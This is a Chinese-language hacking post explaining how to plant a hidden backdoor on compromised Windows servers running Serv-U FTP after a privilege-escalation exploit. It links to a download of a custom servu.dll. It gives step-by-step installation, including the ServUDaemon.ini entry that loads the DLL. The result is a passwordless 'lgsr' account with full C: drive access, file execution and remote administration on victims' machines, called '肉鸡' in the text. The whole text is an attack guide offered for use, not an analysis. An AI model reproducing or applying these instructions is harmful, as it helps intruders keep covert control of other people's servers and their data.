现在大多数的WINDOWS服务器都使用SERV-U做FTP服务器,直到serv-u5.2版为止仍然存在本地权限提升漏洞,在获得了最高控制权限之后,需要留下一个隐蔽的后门,以备我们下次光临。查看,serv-u的帮助文件可知,serv-u提供了一个扩展的接口,通过这个接口可以管理用户的的访问权限。所以我们就很容易就根据这个接口留下一个后门。
下面是我写的一个扩展程序,实现的功能是,如果是帐号lgsr来登陆,就不需要密码,同时把服务器的C:\盘映射到该帐号的主目录,同时赋予lgsr帐号的远程管理权限。
下载地址为:
http://www.yueyong.net/down/ServuBack.rar
http://77169.org/Soft/Class2/Class63/200412/17527.html
安装方法:
ServuBack.rar解压,把servu.dll上传到肉鸡上serv-u安装目录,把打开配置文件ServUDaemon.ini,在文件末尾添加
[EXTERNAL]
ClientCheckDLL1=servu.dll
保存,重新启动,serv-u服务,OK,现在在本地打开SERV-U的管理程序
ServUAdmin.exe,右键新建一个服务器,输入肉鸡的IP地址,帐号lgsr,密码随便填,再填上肉鸡的FTP端口
连接,好了,现在可以远程管理肉鸡上的FTP了,可以随便添加帐号,修改帐号。
另外可以直接用FTP软件用帐号lgsr登陆,密码随便填,就可以访问肉鸡的C盘,上传,修改文件,并具有执行权限。
|
